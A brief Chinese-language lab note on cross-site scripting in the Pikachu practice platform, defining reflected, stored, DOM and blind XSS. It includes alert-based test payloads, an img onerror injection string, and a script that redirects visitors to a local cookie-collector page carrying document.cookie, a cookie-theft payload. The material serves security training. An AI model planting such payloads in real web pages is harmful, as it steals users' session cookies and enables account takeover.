网安-XSS-pikachu
介绍
XSS,即跨站脚本攻击,是指攻击者利用Web服务器中的代码漏洞,在页面中嵌入客户端脚本(通常是一段由JavaScript编写的恶意代码),当信任此Web服务器的用户访问
Web站点中含有恶意脚本代码的页面,用户浏览器会自动加载并执行该恶意代码,从而达到攻击的目的。
XSS分类一般如下:
1.反射型XSS
2.存储型XSS
3.DOM型XSS
1.反射型XSS,非持久性XSS
alert(document.cookie) //弹出当前cookie
2.存储型XSS,持久性XSS,JS代码会存在后台
3.DOM型XSS也是一种反射型,但是输入的语句不是JS的语句,是DOM语法
'"><img οnerrοr=alert(0) src=><"'
利用XSS进行攻击:
攻击方:
找到存储cookie的url:http://localhost/pikachu/pkxss/xssmanager.php/xcookie/cookie.php
编辑攻击代码:
<script>
document.location = 'http://127.0.0.1/pikachu/pkxss/xcookie/cookie.php?cookie=' + document.cookie;
</script>
用户访问留言板,攻击方就收集到用户的cookie 了
4.XSS盲打
攻击的注入点(用户提交数据的页面)和显示点(管理员查看数据的页面)不同。
输入的内容不会在前端输出,而是提交到了后台。
管理员登录后台管理界面,可能遭受到XSS攻击。
5.XSS过滤
<script>
alert(document.cookie)
</script>